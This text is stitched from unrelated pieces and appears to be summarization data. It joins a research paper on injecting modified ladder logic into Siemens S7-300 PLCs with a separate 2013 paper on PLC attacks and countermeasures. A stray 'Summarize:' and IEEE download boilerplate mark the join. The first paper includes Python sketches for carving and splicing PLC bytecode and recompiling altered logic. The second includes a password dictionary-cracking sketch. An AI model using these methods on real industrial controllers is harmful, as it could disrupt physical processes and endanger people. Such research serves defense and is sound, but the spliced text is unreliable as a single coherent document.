1- Compromising the PLC security measures. In this work we skip this step, as it is already achieved and illustrated in detail in our former papers [15], [16], and focus only on the following phases.
2- Stealing the compiled machine bytecode program from the target PLC.
3- Decompiling the bytecode representation of the stolen control logic into its high-level source code (LAD code).
4- Modifying the control logic in its decompiled format by replacing/removing/adding entries from/to the original code.
5- Recompiling the infected code into its low-level representation (that can run on the PLC).
6- Pushing the infected machine bytecode back to the PLC.
A. Extractor - Stealing the Machine Bytecode from the PLC
1) Identify S7Comm requests: As the PLC only sends/receives the control logic program by processing either an upload or a download request sent from the engineering station, our extractor first determines all S7Comm packets exchanged by checking the packet header, precisely the protocol ID (0x32), which is unique for S7Comm frames, and then reads the 13th byte, which indicates the functionality of the S7 command request (see figure 3). This byte is always set to 0x1e and 0x1b for upload and download requests, respectively.
Fig. 3: Identify an S7 request's functionality
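A minimal sketch of this identification step, using the values reported above (protocol ID 0x32, function byte 0x1e/0x1b at the 13th position). The offsets follow the paper's description of the S7Comm frame; in a live capture the S7 PDU sits behind TPKT/COTP headers, so they would be relative to the start of the S7 payload. The function name is our own:

```python
# Sketch of the extractor's request-identification step (section IV-A.1).
# 0x32 marks an S7Comm frame; the 13th byte carries the function code
# (0x1e = upload request, 0x1b = download request per the paper).

UPLOAD, DOWNLOAD = 0x1E, 0x1B

def classify_s7_request(frame):
    """Return 'upload', 'download', or None for other/non-S7 frames."""
    if len(frame) < 13 or frame[0] != 0x32:  # not an S7Comm frame
        return None
    func = frame[12]                         # 13th byte: function code
    if func == UPLOAD:
        return "upload"
    if func == DOWNLOAD:
        return "download"
    return None
```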
2) Extract the data payload: After the PLC receives an upload/download request from the engineering station, it responds by sending either its code to the engineering station for an upload request, or an acknowledgement packet informing the user that it is ready to receive the code of a download request; the engineering station then starts downloading the code into the connected PLC. In this step our extractor records the entire response stream for any identified upload/download request, which eventually contains the bytecode program that the PLC runs. As the network stream consists of different packets, e.g. setup communication, job function, block start, block process, block end, etc., our extractor first needs to filter the stream, keeping only the exact S7 packet that the bytecode is transferred with and ignoring the rest of the packets. Our investigation shows that the S7Comm packet that carries the PLC machine bytecode always has a larger size than the others, precisely larger than 250 bytes. This is due to the fact that for a very simple control logic that comprises only one LAD network, i.e. only one input and one output, the size of the S7 packet that transfers the program is 254 bytes. Therefore, to ensure a successful extraction, our extractor records and saves only the S7 packets that have a size larger than 250 bytes. Please note that the size of the machine bytecode varies significantly depending on the complexity and the number of instructions and networks involved in the program, but as we set the filtering threshold at the minimum size that a PLC program might have, our extractor could successfully filter the network stream for the example application given in section III and retrieve all S7Comm packets that eventually transfer the machine bytecode.
Fig. 4: Extract the data payload from S7Comm packets
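The filtering step, together with the payload carving between the bytecode keys described in section IV-A.3 (start key 0x0082, end key 0x6500) and the inverse splice used by the injector in section IV-E, can be sketched as follows. The 250-byte threshold and the two keys are the values reported in the paper; the function names and the flat list of captured frames are our own framing:

```python
# Sketch of the extractor's filter/carve steps and the injector's splice.
# `frames` is assumed to be a list of raw S7Comm payloads recorded from
# the PLC's response stream.

MIN_SIZE = 250           # smallest S7 frame that can carry a program (paper)
START_KEY = b"\x00\x82"  # machine bytecode begins right after this key
END_KEY = b"\x65\x00"    # and ends right before this one

def carve_bytecode(frames):
    """Return the machine bytecode carved from the first large-enough frame."""
    for raw in frames:
        if len(raw) <= MIN_SIZE:
            continue                  # ack/setup/housekeeping packet
        start = raw.find(START_KEY)
        if start == -1:
            continue
        end = raw.find(END_KEY, start + len(START_KEY))
        if end == -1:
            continue
        return raw[start + len(START_KEY):end]
    return None

def splice_bytecode(raw, malicious):
    """Injector side: replace the bytecode between the keys (assumed present)."""
    start = raw.find(START_KEY) + len(START_KEY)
    end = raw.find(END_KEY, start)
    return raw[:start] + malicious + raw[end:]
```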
Figure 4 shows the snippet of Python code that our extractor uses to filter the network stream and then to extract the raw data from the S7Comm packet. It is worth mentioning that the extracted raw data still needs to be converted into a hex bytecode format for further computing. This is done by utilizing the binascii.hexlify function (as shown in the last line of figure 4).
3) Retrieve the Machine Bytecode from the raw data: Once our extractor has obtained the raw data (that contains the machine bytecode), it then filters this data to retrieve only the machine bytecode, which eventually represents the low-level program that the PLC runs. Our findings show that the machine bytecode is always located between two bytecode keys in the extracted raw data: a start key 0x0082 and an end key 0x6500, as shown in figure 5.
Fig. 5: Raw Data of S7Comm packet captured by Wireshark
By extracting only the bytes located between these two bytecode keys, we managed to successfully get the machine bytecode, which is the input for our decompiler in the next step.
B. Decompiler - Decompiling the Machine Bytecode to Ladder Diagram
Siemens provides its TIA Portal software for engineers to program PLCs in Ladder Diagram (LAD), Function Block Diagram (FBD), Structured Control Language (SCL), and Statement List (STL). In contrast to the text-based SCL and assembler-like STL, the LAD and FBD languages are graphical. The Ladder Diagram (LAD) consists of networks, each of which has elements, e.g. inputs and outputs. Figure 6 shows a simple network example that has eight input entries, one output entry, and three parallel branches.
Fig. 6: An example of Ladder Diagram network in TIA Portal
The TIA Portal software compiles the control logic program, converting it from its high-level format, e.g. its LAD version, into machine bytecode, i.e.
MC7 bytecode that the PLC can read and process. In this work, we developed a decompiler that takes the machine bytecode obtained from our extractor as an input and converts it into LAD source code. Our decompiler comprises two main components: first, the database for mapping each set of hex-bytes to its corresponding LAD entry; second, the mapper program, which utilizes the entries found to generate the final LAD source code. Please note that by instructions we mean inputs, outputs, memory bits, function blocks, data blocks, timers, counters, etc., while entries are the different typed instances of instructions such as Boolean, byte, word, double word, etc., e.g. %I0.1, %Q1.1, %DW0.1, etc.
1) Mapping Database: To create our mapping database, we needed to collect a good number of pairs of hex-bytes and their corresponding LAD entries. This was done by mapping 108 different control logic programs of varying complexity, ranging from simple programs consisting of a few inputs and outputs to more complex ones including multiple inputs, outputs, function blocks, data blocks, organization blocks, timers, counters, etc. All the programs are written for different real physical processes such as a traffic light, a gas pipe, a water tank, etc. Creating our mapping database is done by applying an offline method as follows: we cleared the PLC memory, then opened the TIA Portal software and programmed the PLC with a certain LAD code containing only a single network consisting of 10 repetitions of the same entry. Here we used 10 repetitions of the input %I0.0. Due to the fact that each LAD network must have at least one output located at the end, we concatenated the 10 inputs with %Q0.0 as an output to close the network. After that, we downloaded this program into the PLC and used our extractor to retrieve the machine bytecode representing the low-level code of this single LAD network. We could identify that an %I0.0 entry is always mapped to 0xC000 in the bytecode format.
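The core of this offline differencing idea, once %I0.0 → 0xC000 is known, is to surround an unknown entry with the identified marker, download and extract the bytecode, and strip the known marker bytes so that only the unknown entry's hex-bytes remain. A toy sketch (real MC7 bytecode carries block headers around this region; here we assume the input is just the instruction portion):

```python
# Sketch of the offline mapping idea: strip every known %I0.0 marker
# (0xC000) from the extracted bytecode; the bytes left over map to the
# unknown LAD entry that was sandwiched between the markers.

KNOWN_I00 = b"\xc0\x00"  # %I0.0, identified via the 10-repetition program

def isolate_unknown_entry(bytecode):
    """Remove all known %I0.0 markers; the remainder maps to the new entry."""
    return bytecode.replace(KNOWN_I00, b"")
```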
Afterwards, we cleared the PLC memory again, opened each control logic program used in our experiments in the TIA Portal software separately, and inserted the %I0.0 input before and after each entry, taking into account that each LAD network must be closed with an output. Then we downloaded each newly modified program into the PLC, and retrieved the machine bytecode of each using our extractor. We eventually identified each pair of hex-bytes with its corresponding entry in LAD code. After repeating this process for all 108 programs, we managed to create a mapping database consisting of 3802 entries for 34 different instructions.
2) Mapper Program: Our mapper program reads the output of the extractor (the stolen machine bytecode) and then calls the mapping database to identify the corresponding LAD entries. It works in four steps, as shown in figure 7:
1- It divides the entire bytecode into smaller groups of hex-bytes using a rules-based approach, i.e. it takes all the hex-bytes into one group until an output is reached. Then a new group of hex-bytes starts until reaching another output, and so on.
2- It divides each group into sets of hex-bytes, each representing a potential mapping (entry) in the LAD code.
3- It then compares each set of hex-bytes in each group to the pairs in our database.
4- After successful decompiling, our program generates the LAD code using the following rules, seen in figure 8:
Fig. 7: Our approach used in the mapper program
1- Start a new network until an output is reached.
2- Create a new parallel branch at the current entry being decompiled in case a parallel entry is found, which is mapped to 0xba00 in bytecode. This new branch includes all the following hex-bytes until a jump entry is reached.
3- End the current branch and jump back down to the entry where 0xba00 is located, in case 0xfb00 is found.
4- End the current branch and jump back up to the entry where 0xba00 is located, in case 0xbf00 is found.
Fig. 8: Rules used in our Mapper Program to generate the final LAD code
Figure 9 shows a part of a control logic program decompiled by our LAD decompiler, compared to the original one displayed in the TIA Portal software.
C. Modifier - Modifying the Ladder Diagram
As it is easier for an attacker to parse and manipulate the control logic as LAD code than as machine bytecode, our attack allows the adversary to modify the code in its LAD format at will, i.e. he can modify/inject/delete entries or even networks based on his understanding of the exposed physical process. The modification in this attack is done by using our LAD modifier. Its functionality is to save all the entries used in the PLC program in a text file, precisely in an instructions list. So all the attacker needs to do to modify the PLC program is to open the text file and manipulate the entries listed in the instructions list. Figure 10 shows a snippet of the Python code of our modifier.
Fig. 10: Snippet code for generating instructions list in a text file
As seen, all the decompiled entries that the current PLC program uses are saved in an editable text file (output.txt), and since the attacker is already familiar with the physical process from the previous step, he can modify the instructions list, causing damage in the target system. Figure 11 shows an example of modifying the instruction list in the resulting text file. We replaced the output %Q4.7 with %Q4.1, and the input %I5.6 with the output %Q5.3.
Fig. 11: Modifying the instructions list in the text file
D. Compiler - Compiling the infected LAD source code to machine bytecode
After a successful modification of the control logic, we need to recompile the infected LAD code into machine bytecode before pushing it back to the target PLC.
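The decompile / modify / recompile round trip described in sections IV-B through IV-D can be sketched with a toy mapping table. Only %I0.0 ↔ 0xC000 is taken from the paper's mapping database; the other pairs, the two-byte granularity, and the entry names are hypothetical placeholders (real MC7 entries are multi-byte structures with more context than this):

```python
# Toy round-trip sketch of the decompiler (IV-B), modifier (IV-C) and
# compiler (IV-D). The mapping database here is a stand-in.

MAPPING = {                   # hex-bytes -> LAD entry
    b"\xc0\x00": "%I0.0",     # from the paper's offline mapping
    b"\xc0\x01": "%I0.1",     # hypothetical
    b"\xd0\x00": "%Q0.0",     # hypothetical output entry
    b"\xd0\x01": "%Q0.1",     # hypothetical output entry
}
REVERSE = {v: k for k, v in MAPPING.items()}

def decompile(bytecode):
    """Split the bytecode into 2-byte sets and map each to a LAD entry."""
    return [MAPPING[bytecode[i:i + 2]] for i in range(0, len(bytecode), 2)]

def recompile(entries):
    """Reverse process: map each LAD entry back to its hex-bytes."""
    return b"".join(REVERSE[e] for e in entries)

# Modifier step: swap an output entry, as in the paper's %Q4.7 -> %Q4.1 example.
original = b"\xc0\x00\xc0\x01\xd0\x00"
entries = decompile(original)    # ['%I0.0', '%I0.1', '%Q0.0']
entries[-1] = "%Q0.1"            # malicious edit made in LAD form
infected = recompile(entries)    # bytecode ready to push back to the PLC
```

The same database drives both directions, which is why the paper's compiler is described as the decompiler run in reverse.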
To achieve this, we designed a compiler which works similarly to our above-mentioned decompiler but in a reverse process. It uses the same mapping database to get the equivalent hex-bytes of each entry in the LAD code. Our compiler reads the resulting output of the modifier (the infected LAD code that was saved in a text file), then calls the mapping database and recompiles the entries into their corresponding hex-bytes. Figure 12 shows the output of our compiler, which is the infected machine bytecode that we want the PLC to read and process.
E. Injector - Infecting the PLC
In the final step, the attacker already has the malicious code in its machine bytecode format, and all that is needed to corrupt the system is to push the infected control logic back to the PLC. Due to the lack of integrity checks in S7-300 PLCs, such controllers execute commands whether or not they are delivered from a legitimate user. Therefore, our PLC injector crafts the full S7Comm packet that we want to send to the PLC by placing the malicious machine bytecode (obtained from the previous step) in as raw data and then adding the parameters and the proper S7 packet header. In this work, our PLC injector uses the same S7 packet that our extractor already identified (see section IV-A.2) and replaces only the original machine bytecode located between the start and end keys with the malicious one (the output of our compiler). Afterwards, it injects the crafted packet into the PLC using the well-known Python Snap7 library, precisely the function Cli_Download, as done in our former work [16]. For our example application given in section III, we managed to successfully alter the physical process controlled by the infected PLC, causing a water overflow.
(a) Decompiled Control Logic program (b) Original Control Logic displayed on TIA Portal software Fig.
9: LAD code displayed on the attacker machine and in TIA Portal, respectively
Fig. 12: The original and malicious bytecode respectively
V. EVALUATION OF DECOMPILER AND COMPILER
To assess the accuracy of our decompiler and compiler, we downloaded 5 randomly chosen programs1 to an S7-300 PLC, captured their network traffic and then extracted them from the traffic using our extractor. Afterwards, we ran our decompiler to decompile the programs into their LAD source codes, and then compared the decompiled and original LAD code to measure the accuracy of the decompiler. For evaluating the accuracy of our compiler, we also recompiled the decompiled version back to its machine bytecode and compared both versions (recompiled and original). The experimental results presented in table 1 show that our decompiler and compiler work 100% correctly.
1https://instrumentationtools.com
TABLE 1: The accuracy of the decompiler and compiler
Control Logic Program | Entries in TIA Portal | Entries in Decompiler | Entries in Compiler | Accuracy
Bottle Detection | 7 | 7 | 7 | 100%
Automatic Mixing Controlling in a Tank | 11 | 11 | 11 | 100%
Temperature Control using Pulse Width Modulation | 16 | 16 | 16 | 100%
Car Parking | 16 | 16 | 16 | 100%
Fan Control Unit System for Industry | 17 | 17 | 17 | 100%
VI. DISCUSSION, SECURITY RECOMMENDATIONS, AND FUTURE WORK
We presented an advanced control logic injection attack for altering the program running in an S7 PLC to disrupt physical processes controlled by the compromised device. Our full attack-chain, including security measures exploitation, decompilation, compilation, high-level code modification, and PLC injection, was implemented in a real industrial setting, precisely on real S7-300 PLCs and the engineering software TIA Portal.
As a part of this work, we used 108 different control logic programs to create a sufficiently large mapping database that consists of 3802 entries for 34 different instructions. Our decompiler and compiler were tested and evaluated on 5 different real industrial control logic programs. The experimental results show that our attack scenario successfully managed to alter the program running in the compromised PLC, causing a water overflow in the example application used in this work. From a security point of view, we strongly suggest some countermeasures against our attack, namely protection and detection of control logic changes. The first step to protect such systems from various sorts of attacks is to improve the isolation from other networks [17], combining this with standard security practices [18], and even defence-in-depth security in the control systems [19]. In addition, a digital signature should be applied not only to the firmware, as most of the PLC vendors do, but also to the control logic. Furthermore, a mechanism to check the protocol header, which contains information about the type of the payload, is also recommended as a solution to detect and block any potential unauthorized transfer of the control logic. Finally, Siemens provides users with an MPI adaptor to upload and download the control logic between the TIA Portal and the PLC safely. The MPI protocol is so far not supported by any network sniffers. Taking into account the benefits of using Ethernet/Profinet connections related to cost and convenience, the MPI connection still provides more secure communication between the control center and the remote devices. This helps to prevent attackers from snooping, which in turn improves security, as listening to and capturing packets transferred over the network is the main basis for most attacks against ICSs.
The exploit in this paper is efficient but not at all complicated, as S7-300 PLCs still use the old version of the S7 protocol, which lacks security mechanisms compared to the newer version (S7Comm Plus) that modern S7 PLCs, e.g. S7-1200 and S7-1500 PLCs, use. So in our future work we will investigate whether our control injection attack can be run successfully against the modern S7 PLCs. We are aware of the fact that this will be more challenging, as the S7Comm Plus protocol supports improved security, implementing anti-replay mechanisms and integrity checks.
Summary:
In this paper, we discuss an approach which allows an attacker to modify the control logic program that runs in S7 PLCs in its high-level decompiled format. Our full attack-chain compromises the security measures of PLCs, retrieves the machine bytecode of the target device, and employs a decompiler to convert the stolen compiled bytecode (low-level) to its decompiled version (high-level), e.g. Ladder Diagram (LAD). As the LAD code exposes the structure and semantics of the control logic, our attack also manipulates the LAD code based on the attacker's understanding of the physical process, causing abnormal behaviors of the targeted system. Finally, it converts the infected LAD code to its executable version, i.e. machine bytecode that can run on the PLC, using a compiler, before pushing the malicious code back to the PLC. For a real scenario, we implemented our full attack-chain on a small industrial setting using real S7-300 PLCs, and built the database (for our decompiler and compiler) using 108 different control logic programs of varying complexity, ranging from simple programs consisting of a few instructions to more complex ones including multiple functions, sub-functions and data blocks. We tested and evaluated the accuracy of our decompiler and compiler on 5 random programs written for real industrial applications. Our experimental results showed that an external adversary is able to infect S7 PLCs successfully. We eventually suggest some potential mitigation approaches to secure systems against such a threat.
|
Summarize:
Keywords: PLC vulnerabilities, PLC security, critical infrastructure protection
I. INTRODUCTION
Industrial automation is one of the most popular terms that have been discussed over the past decade. Automation is an important aspect when it comes to industrialization. The goal of automation is to minimize human involvement, both physically and mentally. Most of the critical infrastructure in the world has been automated by means of electronic devices and systems. The most common examples are elevators, escalators and trains. Industrial infrastructure is heavily dependent upon automated control systems. ICSs consist of Supervisory Control and Data Acquisition (SCADA) systems, Distributed Control Systems (DCSs) and Programmable Logic Controllers (PLCs). The main functions of such ICSs are to sense (collect data), monitor, manage and perform actions (decision making based on gathered data). A large portion of an ICS consists of hardware devices, but the most important part is a computer-driven system, which provides an interface to the humans who are monitoring the system. Remote or distributed devices such as PLCs operate under the commands of computers. These commands can be pre-programmed (automated) or manually overridden by people. A computer or a data system can easily be attacked by means of computer viruses. If a virus can attack a computer and affect its programs, an ICS is vulnerable. Even though the manual override option is available, the damage done might be unrecoverable by the time it is activated. Therefore, finding such vulnerabilities and implementing solutions is vital. G. P. H. Sandaruwan, P. S. Ranaweera and Vladimir A. Oleshchuk are with the Dept. of Information and Communication Technology, University of Agder (UiA), N-4898 Grimstad, Norway.
The rest of this paper is organized as follows. Background is explained in Sec. II and then the Related Work is given in Sec.
III, whereas possible attack vectors on PLC based systems are introduced in Sec. IV. Furthermore, countermeasures for securing PLC based systems are given in Sec. V before the paper is concluded in Sec. VI.
II. BACKGROUND
Many believed that a plant control system is an isolated system with no connection to the outside world, and hence that the possibility of an infection is minimal. Usually, computer viruses are ineffective against PLCs. But recent events suggest that SCADA systems are at significant risk even when isolated from the plant's main network. In 2000, the Queensland waste management plant was hacked by a former employee, whereby a large amount of sewage was dumped into public areas in the city. This happened in Australia using only a laptop and a wireless radio. There was a malfunction in two important monitoring systems in the Ohio Davis-Besse nuclear plant due to a worm penetrating its computers in 2003 [1]. This kind of malfunction could also lead to the loss of civilian lives. Incidents that occurred in 1999 and 1992 at Bellingham and Bernham, Texas, respectively, caused three deaths and large damage to the infrastructure due to gas distribution system malfunctions. Two metro trains collided in 2009, which resulted in deaths and injuries to the passengers [1]. Even though such incidents occurred, there was little enthusiasm among the scientific community to explore the security concerns in PLC-related automated systems until the recent past. After the discovery of the Stuxnet malware in 2010, there was a special eagerness among PLC producers as well as users to determine the associated security vulnerabilities in PLC based systems. In other words, Stuxnet opened up a way of redesigning secured PLC architectures. PLC producers such as Hitachi, Mitsubishi, Panasonic, Samsung and Siemens have been working with antivirus producers such as Kaspersky and Symantec in recent years to determine solutions for such vulnerabilities and inefficiencies in PLC systems.
III. RELATED WORK
Malware poses a significant threat to industrial control systems. Fovino et al. [2] have presented the impact of traditional malware on SCADA systems while highlighting their potential damaging effects. Research carried out by Creery et al. [3] has put forward a high-level analysis regarding possible threats to power plant based control systems. Stuxnet can be regarded as a malware, discovered in 2010, that affects the normal functionality of industrial control systems having PLCs through a PLC rootkit [4].
2013 IEEE 8th International Conference on Industrial and Information Systems, ICIIS 2013, Aug. 18-20, 2013, Sri Lanka 978-1-4799-0910-0/13/$31.00 2013 IEEE
Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:20 UTC from IEEE Xplore. Restrictions apply.
Research carried out by R. Masood et al. [5] showed the impact of the Stuxnet worm on PLC systems by using a pressure sensor with a PLC, and how the pressure value drops to an unacceptable value by changing the Keil code of the design. According to E. Byres [6], one of the main exploitable weaknesses in industrial control systems is vulnerabilities in the communication protocols and their implementations. In order to find the shortcomings of the communication protocols, the Group for Advanced Information Technology (GAIT) and Cisco Systems took the initiative in investigating probable vulnerabilities in the SCADA protocols MODBUS and MODBUS/TCP [6]. In the quest of finding solutions to malware attacks, analysis of malware is crucial. With regard to analyzing malware, a limited number of tools are available, mainly for analyzing the latest generation of malicious software [7]. CWSandbox [8] is one such tool, capable of monitoring malware actions on execution. In relation to worm simulation, D. Ellis [9] presented a method based on mathematical propagation models using classical epidemiology, whereas Liljenstam et al.
[10] proposed a method based on single-node worm simulations. According to M. Hentea, in order to manage risks it is important to identify the causes of vulnerabilities and to establish a vulnerability-management life cycle that provides the design and technologies required to find and remediate weaknesses before they are exploited [11]. Patel et al. expressed methods for SCADA security risk analysis by combining the concepts of vulnerability tree analysis, fault tree analysis and attack tree analysis [12].

IV. PLC VULNERABILITY ANALYSIS

PLCs have been used in industrial control systems for more than four decades, though cyber attacks on PLCs came into the picture only very recently. PLCs can be considered PCs, so they are vulnerable to the same types of attacks as traditional IT systems [13][14], though the operation of the attacks may differ, since their target is to drive the physical process under the control of the PLC outside its safety margins. ICSs use a variety of protocols to communicate with field devices such as sensors and actuators, as well as for programming and communicating with PLCs in the process network. MODBUS, Ethernet/IP, DNP3 and ISO-TSAP are among the most commonly used protocols. Though these protocols work efficiently for communication, they were not designed to provide security, since security in industrial systems was not a concern when the protocols were first introduced. These protocols therefore provide neither confidentiality, authentication nor data integrity in operation, which makes them vulnerable to a variety of attacks.

A. By-pass Logic Attack

A PLC generally contains two Random Access Memory (RAM) areas, known as main memory and register memory. The main memory is used for storing the currently executing program logic, whereas the register memory is used as temporary memory by the currently executing logic [1].
Though the register memory is temporary, since it is used by the executing logic it is bound to contain important variables that affect the main logic. Industrial plants generally allow the register memory to be accessed, with read and write operations, by other PCs across the PLC network. Now assume an attacker gains access to one of the machines in the PLC network and infects it with a worm capable of writing arbitrary values to the register memory. By changing register-memory values arbitrarily, the worm can, for example, change a pressure value. The executing logic will then set a new value based on the change, which may cause the system to exceed its safety margins and possibly be driven to collapse.

B. Brute-Force Output Attack

The general functionality of a PLC is to make a decision based on its inputs and states, and then use that decision to change an electrical output in order to alter a physical process. Typically, in industrial SCADA networks, most PLCs contain a special functionality called forcing outputs, which allows a PLC operator to remotely change an output forcefully. This can be done by connecting directly to the PLC, through a network, or over the Internet [1]. The process does not require any authentication mechanism, meaning that anyone who has access can force outputs. The outputs of a PLC may affect physical processes such as governing the speed of a motor or controlling valves, switches, etc., so the consequences will be awful if an attacker gets the opportunity to exploit it. This attack is especially lethal because the intruder does not need any high-level knowledge of the logic; only access is required.

C. Exploits on Siemens Simatic S7 PLCs

This section emphasizes some attacks that can be implemented on Siemens PLCs.
Siemens PLCs use the PROFINET fieldbus standard, which is based on Ethernet, to create a workable environment for networking protocols and industrial automation. They are programmed with the Simatic TIA and Step 7 engineering software, and the communication between the software and the PLCs is based on the International Standards Organization Transport Service Access Point (ISO-TSAP) protocol. This protocol does not provide any encryption for the data exchanged with the PLC, meaning that all data are sent as plaintext. The vulnerabilities discussed below exploit this weakness of the ISO-TSAP protocol.

1) Replay Attack: The general idea of a replay attack is that an attacker intercepts some information or data and uses it to compromise the system at a later time. Before getting to grips with the replay attack, a simple experiment gives us some idea of the information exchanged between the PLC and the Step 7 programming software. Assume we have connected a PLC to a test network and run the Step 7 software on the programming PC. To analyze the packet flow between the PLC and the software, we can use a packet analyzer such as Wireshark, because the ISO-TSAP protocol used for communication is based on the Transmission Control Protocol (TCP). After establishing the connection, we can send a CPU STOP command to the PLC and start capturing packets with Wireshark. After the PLC's CPU has stopped, we can see what information was exchanged during command execution by analyzing the captured packets. Fig. 1 shows a TCP stream captured during the execution of a CPU STOP command [13].
Fig. 1. Captured TCP stream during a CPU STOP command [13]

In Fig. 1, the information highlighted in blue is the data sent from the PLC to the Step 7 engineering software. It includes some valuable facts about the PLC, such as its type, model number, etc. The raw data shown in red gives some indication of the client-side information. This information by itself could be very important to an attacker, since it helps him build malware that specifically targets a PLC in the system at a later time. Since the above information is revealed through the CPU STOP command, this is known as a CPU Start-Stop Attack. If the attacker is knowledgeable about the communication between the PLC and the engineering software, he can capture more information about the PLC, its logic, and even the underlying physical process. We showed above that interception of packets during a single command can reveal a great deal of valuable data, so listening to a full communication session will obviously provide much more. The attacker thus has the capability to reuse the gathered data, manipulating it to his liking and even adding malicious code, in a replay attack that compromises the PLC. Since none of the intercepted data is encrypted, the attacker can make the replay attack worse than it looks, especially compared with replay attacks on normal IT networks.

2) Man in the Middle (MitM) Attack: Another significant vulnerability of the ISO-TSAP protocol is that an attacker can act as a man in the middle between the PLC and the Step 7 software, taking advantage of the authentication-less nature of the protocol. The attacker can thus gather all data transmitted from the software to the PLC and vice versa without being noticed at either end.
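The first step an attacker takes with such a capture is mining it for identifying strings, much like the blue and red data visible in Fig. 1. A minimal sketch of that step follows; the sample payload and its framing bytes are invented for illustration, not taken from a real S7 trace.

```python
# Minimal sketch: scan a captured plaintext payload for printable ASCII runs,
# the way an attacker would mine a Wireshark capture for PLC identifiers.

def printable_runs(data: bytes, min_len: int = 4) -> list[str]:
    """Return runs of printable ASCII characters of at least min_len bytes."""
    runs, current = [], bytearray()
    for b in data:
        if 0x20 <= b <= 0x7E:          # printable ASCII range
            current.append(b)
        else:
            if len(current) >= min_len:
                runs.append(current.decode("ascii"))
            current = bytearray()
    if len(current) >= min_len:
        runs.append(current.decode("ascii"))
    return runs

# Invented example payload: binary framing bytes around identifying strings.
payload = b"\x03\x00\x00\x1f\x02\xf0\x80CPU 315-2 DP\x00\x00Original Siemens Equipment\x00"
print(printable_runs(payload))  # ['CPU 315-2 DP', 'Original Siemens Equipment']
```

Because ISO-TSAP carries everything as plaintext, even this trivial scan recovers the PLC type and vendor strings without any protocol knowledge.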
The information revealed through a MitM attack may also help an attacker to efficiently mount an attack on the process being controlled by the PLC.

3) S7 Authentication Bypass Attack: In some cases PLCs can be protected by passwords, though this is not very popular in industrial automation, mainly because operators did not believe it possible to mount attacks against PLCs, since the field network is generally isolated. Even when a PLC is password-protected, an attacker can bypass the authentication due to the lack of security in the protocol. The scenario is as follows. When a legitimate user needs to authenticate himself to the PLC, he sends an authentication packet containing a hash of the PLC's password. On receiving the packet, the PLC verifies the user by comparing its own hash of the password with the received one; if the two match, the user is authenticated and given access to the system. From the attacker's perspective, if he can grab an authentication packet from a valid user, he can replay that packet later to authenticate himself to the PLC. Alternatively, he can hash a dictionary of commonly used passwords and look for a match with the intercepted hash, thereby recovering the plaintext password; this allows the attacker to generate his own authentication packets as well. All of this suggests that protecting Siemens PLCs with passwords does not actually achieve its ultimate goal.

V. SECURING PLC SYSTEMS

When industrial systems were first deployed, no one believed it possible to insert a malicious agent into the system and make it vulnerable. Most of the protocols and standards governing communication inside these systems were developed on this presumption, which has now proved to be wrong.
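Before turning to countermeasures, it is worth seeing how little effort some of the exploits of Sec. IV require. The offline dictionary attack on an intercepted password hash can be sketched in a few lines; the real S7 hashing scheme is proprietary, so SHA-256 stands in here purely for illustration, and the captured digest is a hypothetical example.

```python
# Sketch of the offline dictionary attack: hash each candidate password and
# compare with the intercepted digest. SHA-256 is an illustrative stand-in
# for the proprietary S7 password-hash scheme.
import hashlib

def crack(intercepted_digest, dictionary):
    """Return the plaintext password whose hash matches, or None."""
    for candidate in dictionary:
        if hashlib.sha256(candidate.encode()).digest() == intercepted_digest:
            return candidate
    return None

# Hypothetical capture: the operator chose a weak, common password.
captured = hashlib.sha256(b"admin123").digest()
print(crack(captured, ["password", "123456", "admin123", "plc2013"]))  # admin123
```

No cryptanalysis is involved: the attack succeeds whenever the password appears in a wordlist, which is exactly why password protection alone does not secure the PLC.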
The following are some countermeasures that can be adopted to secure critical infrastructure in industrial systems.

A. Protocol Modification to Enhance Security

The main reason for the vulnerability of PLC-based industrial systems is flaws in protocols such as DNP3, Modbus and Profibus that are used for communication between PLCs and process-network machines (MTUs). The inability of these protocols to provide authentication, confidentiality and integrity makes the system exploitable in many ways, and the fact that some of these exploits require no high-level cryptanalytic knowledge makes the scenario far worse. In this section we discuss a method for securing an existing protocol by introducing some modifications to the Modbus protocol. We will see how the structure of the protocol can be modified to provide data integrity and authentication between nodes of a process network. Fig. 2 illustrates a modified Modbus data unit which can fulfil these security requirements.

Fig. 2. Secure Modbus Application Data Unit

1) Achieving Data Integrity: To achieve data integrity, the data unit is transmitted along with a Secure Hash Algorithm 2 (SHA-2) digest of the data unit. On reception, a device in the process network recalculates the digest from the data and checks it against the digest sent by the source. The data unit is accepted only if the computed digest matches the one sent by the source device. If the data is altered during transmission, the new SHA-2 digest will differ from the digest precomputed at the source, allowing the destination to detect the alteration.
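The digest mechanism above can be sketched as follows. This is a minimal illustration, not the exact field layout of the modified data unit in Fig. 2; the example data unit bytes are invented.

```python
# Sketch of the integrity mechanism: append a SHA-256 digest to the data
# unit at the sender, recompute and compare it at the receiver.
import hashlib

DIGEST_LEN = hashlib.sha256().digest_size  # 32 bytes

def protect(data_unit: bytes) -> bytes:
    """Sender side: transmit the data unit followed by its SHA-256 digest."""
    return data_unit + hashlib.sha256(data_unit).digest()

def verify(frame: bytes) -> bytes:
    """Receiver side: recompute the digest; accept the data unit only on a match."""
    data_unit, digest = frame[:-DIGEST_LEN], frame[-DIGEST_LEN:]
    if hashlib.sha256(data_unit).digest() != digest:
        raise ValueError("integrity check failed - frame dropped")
    return data_unit

frame = protect(b"\x01\x06\x00\x10\x00\xff")         # invented example data unit
assert verify(frame) == b"\x01\x06\x00\x10\x00\xff"  # unmodified frame: accepted

tampered = bytes([frame[0] ^ 0x01]) + frame[1:]      # attacker flips one bit
# verify(tampered) now raises ValueError, detecting the alteration
```

Note that a bare digest only detects accidental or in-transit modification; an attacker who recomputes the digest defeats it, which is why the next subsection adds a signature.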
2) Establishing Authentication: Authentication among the end devices of a process network can be established by having each device manage a pair of private and public keys. The private key is known only to the device that owns it, whereas the public key is known to all devices in the network. Consider a master device sending a control signal to a slave in the process network. The master generates the relevant data, computes a SHA-2 digest, and signs it with its private key before sending it to the corresponding slave device. Since the private key is known only to that specific device, the slave can authenticate the master by verifying the signed digest with the master's public key.

3) Protection against Replay Attacks: To prevent replay attacks, there must be some way to distinguish a packet that originated just now from a packet that was captured earlier and injected into the network later. This can be achieved by introducing a Timestamp (TS) into the data unit. Since there is a finite delay between sending and receiving packets, and devices may not be perfectly synchronized, the receiver has to use a specific timing window to decide whether to accept or drop a packet. If the packet arrives at the destination within the receiver's timing window it is accepted; otherwise it is discarded. The timing window must be large enough not to drop legitimate packets, yet small enough to prevent an attacker from using the window for a replay attack, so choosing an appropriate timing window is vital.

B. Protection via Special Filtering Units

